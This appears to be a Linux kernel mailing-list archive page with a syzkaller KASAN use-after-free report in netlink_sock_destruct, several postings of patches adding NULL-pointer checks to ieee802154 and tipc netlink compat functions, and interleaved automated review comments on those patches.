On 2016/5/26 23:06, Eric Dumazet wrote: > On Thu, 2016-05-26 at 22:48 +0800, Baozeng Ding wrote: >> Hi all, >> I've got the following report use-after-free in netlink_sock_destruct while >> running syzkaller. >> Unfortunately no reproducer.The kernel version is 4.6 (May 15, on commit >> 2dcd0af568b0cf583645c8a317dd12e344b1c72a). Thanks. >> >> == >> BUG: KASAN: use-after-free in kfree_skb+0x28c/0x310 at addr 880036c1179c >> Read of size 4 by task syz-executor/21618 >> = >> BUG skbuff_head_cache (Tainted: GW ): kasan: bad access detected >> - >> >> Disabling lock debugging due to kernel taint >> INFO: Slab 0xeadb0400 objects=25 used=3 fp=0x880036c116c0 >> flags=0x1fffc004080 >> INFO: Object 0x880036c11680 @offset=5760 fp=0x >> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS >> rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 >> 0002 88006da07c40 8295f5f1 88003e0fc5c0 >> 880036c11680 eadb0400 880036c1 88006da07c70 >> 8171144d 88003e0fc5c0 eadb0400 880036c11680 >> Call Trace: >> [< inline >] __dump_stack /lib/dump_stack.c:15 >> [] dump_stack+0xb3/0x112 /lib/dump_stack.c:51 >> [] print_trailer+0x10d/0x190 /mm/slub.c:667 >> [] object_err+0x2f/0x40 /mm/slub.c:674 >> [< inline >] print_address_description /mm/kasan/report.c:179 >> [] kasan_report_error+0x218/0x530 /mm/kasan/report.c:275 >> [] ? debug_check_no_locks_freed+0x290/0x290 >> /kernel/locking/lockdep.c:4212 >> [< inline >] kasan_report /mm/kasan/report.c:297 >> [] __asan_report_load4_noabort+0x3e/0x40 >> /mm/kasan/report.c:317 >> [< inline >] ? atomic_read /include/linux/compiler.h:222 >> [] ? kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 >> [< inline >] atomic_read /include/linux/compiler.h:222 >> [] kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 >> [] netlink_sock_destruct+0xeb/0x2b0 >> /net/netlink/af_netlink.c:334 >> [] ? 
__netlink_create+0x1d0/0x1d0 >> /net/netlink/af_netlink.c:577 >> [] sk_destruct+0x4a/0x4f0 /net/core/sock.c:1429 >> [] __sk_free+0x57/0x200 /net/core/sock.c:1459 >> [] sk_free+0x30/0x40 /net/core/sock.c:1470 >> [< inline >] sock_put /include/net/sock.h:1506 >> [] deferred_put_nlk_sk+0x34/0x40 >> /net/netlink/af_netlink.c:652 >> [< inline >] __rcu_reclaim /kernel/rcu/rcu.h:118 >> [< inline >] rcu_do_batch /kernel/rcu/tree.c:2681 >> [< inline >] invoke_rcu_callbacks /kernel/rcu/tree.c:2947 >> [< inline >] __rcu_process_callbacks /kernel/rcu/tree.c:2914 >> [] rcu_process_callbacks+0xa71/0x11d0 >> /kernel/rcu/tree.c:2931 >> [< inline >] ? __rcu_reclaim /kernel/rcu/rcu.h:108 >> [< inline >] ? rcu_do_batch /kernel/rcu/tree.c:2681 >> [< inline >] ? invoke_rcu_callbacks /kernel/rcu/tree.c:2947 >> [< inline >] ? __rcu_process_callbacks /kernel/rcu/tree.c:2914 >> [] ? rcu_process_callbacks+0xa1c/0x11d0 >> /kernel/rcu/tree.c:2931 >> [] ? __netlink_deliver_tap+0x7c0/0x7c0 >> /net/netlink/af_netlink.c:204 >> [] __do_softirq+0x22b/0x8da /kernel/softirq.c:273 >> [< inline >] invoke_softirq /kernel/softirq.c:350 >> [] irq_exit+0x15d/0x190 /kernel/softirq.c:391 >> [< inline >] exiting_irq /./arch/x86/include/asm/apic.h:658 >> [] smp_apic_timer_interrupt+0x7b/0xa0 >> /arch/x86/kernel/apic/apic.c:932 >> [] apic_timer_interrupt+0x8c/0xa0 >> /arch/x86/entry/entry_64.S:454 >> [< inline >] ? atomic_add_return >> /./arch/x86/include/asm/atomic.h:156 >> [< inline >] ? kref_get /include/linux/kref.h:46 >> [] ? klist_next+0x177/0x400 /lib/klist.c:393 >> [< inline >] ? kref_get /include/linux/kref.h:46 >> [] ? klist_next+0x168/0x400 /lib/klist.c:393 >> [] class_dev_iter_next+0x8b/0xd0 /drivers/base/class.c:324 >> [] ? tty_get_pgrp+0x80/0x80 /drivers/tty/tty_io.c:2525 >> [] class_find_device+0x101/0x1c0 /drivers/base/class.c:428 >> [] ? class_for_each_device+0x1d0/0x1d0 >> /drivers/base/class.c:375 >> [< inline >] tty_get_device /drivers/tty/tty_io.c:3139 >> [] alloc_t
BUG: net/netlink: KASAN: use-after-free in netlink_sock_destruct
Hi all, I've got the following report use-after-free in netlink_sock_destruct while running syzkaller. Unfortunately no reproducer.The kernel version is 4.6 (May 15, on commit 2dcd0af568b0cf583645c8a317dd12e344b1c72a). Thanks. == BUG: KASAN: use-after-free in kfree_skb+0x28c/0x310 at addr 880036c1179c Read of size 4 by task syz-executor/21618 = BUG skbuff_head_cache (Tainted: GW ): kasan: bad access detected - Disabling lock debugging due to kernel taint INFO: Slab 0xeadb0400 objects=25 used=3 fp=0x880036c116c0 flags=0x1fffc004080 INFO: Object 0x880036c11680 @offset=5760 fp=0x Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 0002 88006da07c40 8295f5f1 88003e0fc5c0 880036c11680 eadb0400 880036c1 88006da07c70 8171144d 88003e0fc5c0 eadb0400 880036c11680 Call Trace: [< inline >] __dump_stack /lib/dump_stack.c:15 [] dump_stack+0xb3/0x112 /lib/dump_stack.c:51 [] print_trailer+0x10d/0x190 /mm/slub.c:667 [] object_err+0x2f/0x40 /mm/slub.c:674 [< inline >] print_address_description /mm/kasan/report.c:179 [] kasan_report_error+0x218/0x530 /mm/kasan/report.c:275 [] ? debug_check_no_locks_freed+0x290/0x290 /kernel/locking/lockdep.c:4212 [< inline >] kasan_report /mm/kasan/report.c:297 [] __asan_report_load4_noabort+0x3e/0x40 /mm/kasan/report.c:317 [< inline >] ? atomic_read /include/linux/compiler.h:222 [] ? kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 [< inline >] atomic_read /include/linux/compiler.h:222 [] kfree_skb+0x28c/0x310 /net/core/skbuff.c:699 [] netlink_sock_destruct+0xeb/0x2b0 /net/netlink/af_netlink.c:334 [] ? 
__netlink_create+0x1d0/0x1d0 /net/netlink/af_netlink.c:577 [] sk_destruct+0x4a/0x4f0 /net/core/sock.c:1429 [] __sk_free+0x57/0x200 /net/core/sock.c:1459 [] sk_free+0x30/0x40 /net/core/sock.c:1470 [< inline >] sock_put /include/net/sock.h:1506 [] deferred_put_nlk_sk+0x34/0x40 /net/netlink/af_netlink.c:652 [< inline >] __rcu_reclaim /kernel/rcu/rcu.h:118 [< inline >] rcu_do_batch /kernel/rcu/tree.c:2681 [< inline >] invoke_rcu_callbacks /kernel/rcu/tree.c:2947 [< inline >] __rcu_process_callbacks /kernel/rcu/tree.c:2914 [] rcu_process_callbacks+0xa71/0x11d0 /kernel/rcu/tree.c:2931 [< inline >] ? __rcu_reclaim /kernel/rcu/rcu.h:108 [< inline >] ? rcu_do_batch /kernel/rcu/tree.c:2681 [< inline >] ? invoke_rcu_callbacks /kernel/rcu/tree.c:2947 [< inline >] ? __rcu_process_callbacks /kernel/rcu/tree.c:2914 [] ? rcu_process_callbacks+0xa1c/0x11d0 /kernel/rcu/tree.c:2931 [] ? __netlink_deliver_tap+0x7c0/0x7c0 /net/netlink/af_netlink.c:204 [] __do_softirq+0x22b/0x8da /kernel/softirq.c:273 [< inline >] invoke_softirq /kernel/softirq.c:350 [] irq_exit+0x15d/0x190 /kernel/softirq.c:391 [< inline >] exiting_irq /./arch/x86/include/asm/apic.h:658 [] smp_apic_timer_interrupt+0x7b/0xa0 /arch/x86/kernel/apic/apic.c:932 [] apic_timer_interrupt+0x8c/0xa0 /arch/x86/entry/entry_64.S:454 [< inline >] ? atomic_add_return /./arch/x86/include/asm/atomic.h:156 [< inline >] ? kref_get /include/linux/kref.h:46 [] ? klist_next+0x177/0x400 /lib/klist.c:393 [< inline >] ? kref_get /include/linux/kref.h:46 [] ? klist_next+0x168/0x400 /lib/klist.c:393 [] class_dev_iter_next+0x8b/0xd0 /drivers/base/class.c:324 [] ? tty_get_pgrp+0x80/0x80 /drivers/tty/tty_io.c:2525 [] class_find_device+0x101/0x1c0 /drivers/base/class.c:428 [] ? class_for_each_device+0x1d0/0x1d0 /drivers/base/class.c:375 [< inline >] tty_get_device /drivers/tty/tty_io.c:3139 [] alloc_tty_struct+0x5fb/0x840 /drivers/tty/tty_io.c:3183 [] ? do_SAK_work+0x20/0x20 /drivers/tty/tty_io.c:3112 [] ? 
mutex_lock_interruptible_nested+0x980/0x980 ??:? [] tty_init_dev+0x78/0x4b0 /drivers/tty/tty_io.c:1532 [< inline >] tty_open_by_driver /drivers/tty/tty_io.c:2065 [] tty_open+0xd31/0x1050 /drivers/tty/tty_io.c:2113 [] ? tty_init_dev+0x4b0/0x4b0 /drivers/tty/tty_io.c:1543 [< inline >] ? spin_unlock /include/linux/spinlock.h:347 [] ? chrdev_open+0xbf/0x4c0 /fs/char_dev.c:376 [] ? tty_init_dev+0x4b0/0x4b0 /drivers/tty/tty_io.c:1543 [] chrdev_open+0x22a/0x4c0 /fs/char_dev.c:388 [] ? cdev_put+0x60/0x60 /fs/char_dev.c:338 [] ? __fsnotify_parent+0x5e/0x2b0 /fs/notify/fsnotify.c:98 [] ? security_file_open+0x89/0x190 /security/security.c:840 [] do_dentry_open+0x6a2/0xcb0 /fs/open.c:736 [] ? cdev_put+0x60/0x60 /fs/char_dev.c:338 [] vfs_open+0x113/0x210 /fs/open.c:849 [] ? may_open+0x1cd/0x260 /fs/namei.c:2776 [< inline >] do_las
[PATCH net] ieee802154: fix logic error in ieee802154_llsec_parse_dev_addr
Fix a logic error to avoid potential null pointer dereference. Signed-off-by: Baozeng Ding --- net/ieee802154/nl802154.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index ca207db..116187b 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -1289,8 +1289,8 @@ ieee802154_llsec_parse_dev_addr(struct nlattr *nla, nl802154_dev_addr_policy)) return -EINVAL; - if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] && - !attrs[NL802154_DEV_ADDR_ATTR_MODE] && + if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] || + !attrs[NL802154_DEV_ADDR_ATTR_MODE] || !(attrs[NL802154_DEV_ADDR_ATTR_SHORT] || attrs[NL802154_DEV_ADDR_ATTR_EXTENDED])) return -EINVAL; -- 1.9.1
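Review bot: The corrected condition now requires PAN_ID and MODE plus at least one of SHORT/EXTENDED, which matches what the commit message implies, but the doubly negated compound expression is hard to read and a one-line comment above it would record the contract: `/* PAN_ID and MODE are mandatory, plus at least one of SHORT/EXTENDED */`. The check still accepts a message that carries both SHORT and EXTENDED; whether that is harmless depends on how the function chooses between them afterwards, which lies outside the hunk (ieee802154_llsec_parse_dev_addr continues past it). The identical repost of this patch further down the page shares both remarks.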
[PATCH net] ieee802154: fix logic error in ieee802154_llsec_parse_dev_addr
Fix a logic error to avoid potential null pointer dereference. Signed-off-by: Baozeng Ding --- net/ieee802154/nl802154.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index ca207db..116187b 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -1289,8 +1289,8 @@ ieee802154_llsec_parse_dev_addr(struct nlattr *nla, nl802154_dev_addr_policy)) return -EINVAL; - if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] && - !attrs[NL802154_DEV_ADDR_ATTR_MODE] && + if (!attrs[NL802154_DEV_ADDR_ATTR_PAN_ID] || + !attrs[NL802154_DEV_ADDR_ATTR_MODE] || !(attrs[NL802154_DEV_ADDR_ATTR_SHORT] || attrs[NL802154_DEV_ADDR_ATTR_EXTENDED])) return -EINVAL; -- 1.9.1
[PATCH v2] tipc: fix potential null pointer dereferences in some compat functions
Before calling the nla_parse_nested function, make sure the pointer to the attribute is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- v2: declare local variable as reverse christmas tree format and make the commit log fit in 80 columns --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index d7d050f..72a1c8f 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -346,9 +346,15 @@ static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; + int err; + + if (!attrs[TIPC_NLA_BEARER]) + return -EINVAL; - nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], -NULL); + err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); + if (err) + return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), 
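Review bot: The new guard validates the outer container attrs[TIPC_NLA_BEARER] and finally propagates nla_parse_nested's return value, but the very next line still passes `bearer[TIPC_NLA_BEARER_NAME]` to nla_data()/nla_len() without checking that the nested parse produced it, and nla_parse_nested does not make any particular attribute mandatory. `if (!bearer[TIPC_NLA_BEARER_NAME]) return -EINVAL;` after the err check closes that gap, and the link_stat_dump and link_dump hunks on the following line have the same shape with link[TIPC_NLA_LINK_NAME]. The NULL policy passed here also means the name payload is not validated as a NUL-terminated string, so the strcmp()/strcpy() on nla_data() downstream rely on the sender; a policy with NLA_NUL_STRING entries would supply that guarantee. The two later [PATCH net] postings of this change on the page share all of this; tipc_nl_compat_bearer_dump continues outside the hunk.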
@@ -460,14 +466,31 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; + int err; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; - nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], -NULL); + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], + NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_PROP]) + return -EINVAL; - nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], -NULL); + err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_STATS]) + return -EINVAL; + + err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); + if (err) + return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -569,8 +592,15 @@ static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, { struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; + int err; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; + + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], + NULL); + if (err) + return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); 
@@ -758,12 +788,23 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, u32 node, depth, type, lowbound, upbound; static const char * const scope_str[] = {"", " zone", " cluster", " node"}; + int err; - nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, -attrs[TIPC_NLA_NAME_TABLE], NULL); + if (!attrs[TIPC_NLA_NAME_TABLE]) + return -EINVAL; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], -NULL); + err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); + if (err) + return err; + + if (!nt[TIPC_NLA_NAME_TABLE_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL); + if (err) + return err; ntq = (struct tipc_name_table_query *)TLV_DATA(msg->req); @@ -815,8 +856,15 @@ static int __tipc_nl_compat_publ_dump(struct tipc_nl_compat_msg *msg, { u32 type, lower, upper; struct nlattr *publ[TIPC_NLA_PUBL_MAX + 1]; + int err; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, attrs[TIPC_NLA_PUBL], NULL); + if (!attrs[TIPC_NLA_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, attrs[TIPC_NLA_PUBL], + N
[PATCH net] tipc: fix potential null-ptr dereference bugs in netlink compat functions
Before calling the nla_parse_nested function, its third argument should be checked to make sure it is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index 4dfc5c1..1e18b78 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -345,10 +345,16 @@ static int tipc_nl_compat_doit(struct tipc_nl_compat_cmd_doit *cmd, static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; - nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], -NULL); + if (!attrs[TIPC_NLA_BEARER]) + return -EINVAL; + + err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); + if (err) + return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), 
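Review bot: `int err;` is inserted ahead of the longer `struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1];` declaration in this hunk, and likewise at the top of the declaration blocks in the link_stat_dump, link_dump and name_table_dump hunks on the following lines, which is the reverse of netdev's longest-first ("reverse christmas tree") ordering; moving `int err;` to the end of each block fixes it, as the v2 posting earlier on this page already does. The code change itself appears to be the same as v2, so the remarks on that posting about the unchecked inner name attribute and the NULL policy apply here as well. The duplicate posting of this patch further down the page is covered by the same note. tipc_nl_compat_bearer_dump continues outside the hunk.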
@@ -456,18 +462,35 @@ static void __fill_bc_link_stat(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char *name; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; - nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], -NULL); + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_PROP]) + return -EINVAL; - nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], -NULL); + err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_STATS]) + return -EINVAL; + + err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); + if (err) + return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -567,10 +590,17 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; + + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); 
@@ -751,6 +781,7 @@ static int tipc_nl_compat_name_table_dump_header(struct tipc_nl_compat_msg *msg) static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char port_str[27]; struct tipc_name_table_query *ntq; struct nlattr *nt[TIPC_NLA_NAME_TABLE_MAX + 1]; @@ -759,11 +790,21 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, static const char * const scope_str[] = {"", " zone", " cluster", " node"}; - nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, -attrs[TIPC_NLA_NAME_TABLE], NULL); + if (!attrs[TIPC_NLA_NAME_TABLE]) + return -EINVAL; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], -NULL); + err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); + if (err) + return err; + + if (!nt[TIPC_NLA_NAME_TABLE_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL
[PATCH net] tipc: fix potential null pointer dereference in some compat functions
Before calling the nla_parse_nested function, make sure the pointer to the attribute is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index 4dfc5c1..1e18b78 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -345,10 +345,16 @@ static int tipc_nl_compat_doit(struct tipc_nl_compat_cmd_doit *cmd, static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; - nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], -NULL); + if (!attrs[TIPC_NLA_BEARER]) + return -EINVAL; + + err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); + if (err) + return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]), 
@@ -456,18 +462,35 @@ static void __fill_bc_link_stat(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char *name; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; - nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], -NULL); + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_PROP]) + return -EINVAL; - nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], -NULL); + err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); + if (err) + return err; + + if (!link[TIPC_NLA_LINK_STATS]) + return -EINVAL; + + err = nla_parse_nested(stats, TIPC_NLA_STATS_MAX, + link[TIPC_NLA_LINK_STATS], NULL); + if (err) + return err; name = (char *)TLV_DATA(msg->req); if (strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME])) != 0) @@ -567,10 +590,17 @@ static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct tipc_link_info link_info; - nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); + if (!attrs[TIPC_NLA_LINK]) + return -EINVAL; + + err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); + if (err) + return err; link_info.dest = nla_get_flag(link[TIPC_NLA_LINK_DEST]); link_info.up = htonl(nla_get_flag(link[TIPC_NLA_LINK_UP])); 
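Review bot: The three new guards in tipc_nl_compat_link_stat_dump protect the container attributes, but the first thing the function does after them is `strcmp(name, nla_data(link[TIPC_NLA_LINK_NAME]))`, and `link[TIPC_NLA_LINK_NAME]` is never tested — with a NULL policy nla_parse_nested() does not require it, so an absent link name still reaches nla_data() on a NULL pointer. Add `if (!link[TIPC_NLA_LINK_NAME]) return -EINVAL;` alongside the other checks. Separately, `name` is taken straight from the request TLV via `TLV_DATA(msg->req)`; whether the caller validates its length and NUL termination is not visible here, and without that strcmp() can read past the request buffer. The function continues past the hunk.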
@@ -751,6 +781,7 @@ static int tipc_nl_compat_name_table_dump_header(struct tipc_nl_compat_msg *msg) static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { + int err; char port_str[27]; struct tipc_name_table_query *ntq; struct nlattr *nt[TIPC_NLA_NAME_TABLE_MAX + 1]; @@ -759,11 +790,21 @@ static int tipc_nl_compat_name_table_dump(struct tipc_nl_compat_msg *msg, static const char * const scope_str[] = {"", " zone", " cluster", " node"}; - nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, -attrs[TIPC_NLA_NAME_TABLE], NULL); + if (!attrs[TIPC_NLA_NAME_TABLE]) + return -EINVAL; - nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, nt[TIPC_NLA_NAME_TABLE_PUBL], -NULL); + err = nla_parse_nested(nt, TIPC_NLA_NAME_TABLE_MAX, + attrs[TIPC_NLA_NAME_TABLE], NULL); + if (err) + return err; + + if (!nt[TIPC_NLA_NAME_TABLE_PUBL]) + return -EINVAL; + + err = nla_parse_nested(publ, TIPC_NLA_PUBL_MAX, + nt[TIPC_NLA_NAME_TABLE_PUBL], NULL); + if (
[PATCH] net/tipc: fix potential null pointer dereference in several tipc netlink compat functions
Before calling the nla_parse_nested function, its third argument should be checked to make sure it is not null. This patch fixes several potential null pointer dereference vulnerabilities in the tipc netlink functions. Signed-off-by: Baozeng Ding --- net/tipc/netlink_compat.c | 111 ++ 1 file changed, 93 insertions(+), 18 deletions(-) diff --git a/net/tipc/netlink_compat.c b/net/tipc/netlink_compat.c index 4dfc5c1..959e989 100644 --- a/net/tipc/netlink_compat.c +++ b/net/tipc/netlink_compat.c @@ -345,10 +345,16 @@ static int tipc_nl_compat_doit(struct tipc_nl_compat_cmd_doit *cmd, static int tipc_nl_compat_bearer_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; struct nlattr *bearer[TIPC_NLA_BEARER_MAX + 1]; -nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, attrs[TIPC_NLA_BEARER], - NULL); +if (!attrs[TIPC_NLA_BEARER]) +return -EINVAL; + +err = nla_parse_nested(bearer, TIPC_NLA_BEARER_MAX, + attrs[TIPC_NLA_BEARER], NULL); +if (err) +return err; return tipc_add_tlv(msg->rep, TIPC_TLV_BEARER_NAME, nla_data(bearer[TIPC_NLA_BEARER_NAME]),
@@ -456,18 +462,35 @@ static void __fill_bc_link_stat(struct tipc_nl_compat_msg *msg, static int tipc_nl_compat_link_stat_dump(struct tipc_nl_compat_msg *msg, struct nlattr **attrs) { +int err; char *name; struct nlattr *link[TIPC_NLA_LINK_MAX + 1]; struct nlattr *prop[TIPC_NLA_PROP_MAX + 1]; struct nlattr *stats[TIPC_NLA_STATS_MAX + 1]; -nla_parse_nested(link, TIPC_NLA_LINK_MAX, attrs[TIPC_NLA_LINK], NULL); +if (!attrs[TIPC_NLA_LINK]) +return -EINVAL; -nla_parse_nested(prop, TIPC_NLA_PROP_MAX, link[TIPC_NLA_LINK_PROP], - NULL); +err = nla_parse_nested(link, TIPC_NLA_LINK_MAX, + attrs[TIPC_NLA_LINK], NULL); +if (err) +return err; + +if (!link[TIPC_NLA_LINK_PROP]) +return -EINVAL; -nla_parse_nested(stats, TIPC_NLA_STATS_MAX, link[TIPC_NLA_LINK_STATS], - NULL); +err = nla_parse_nested(prop, TIPC_NLA_PROP_MAX, + link[TIPC_NLA_LINK_PROP], NULL); +if 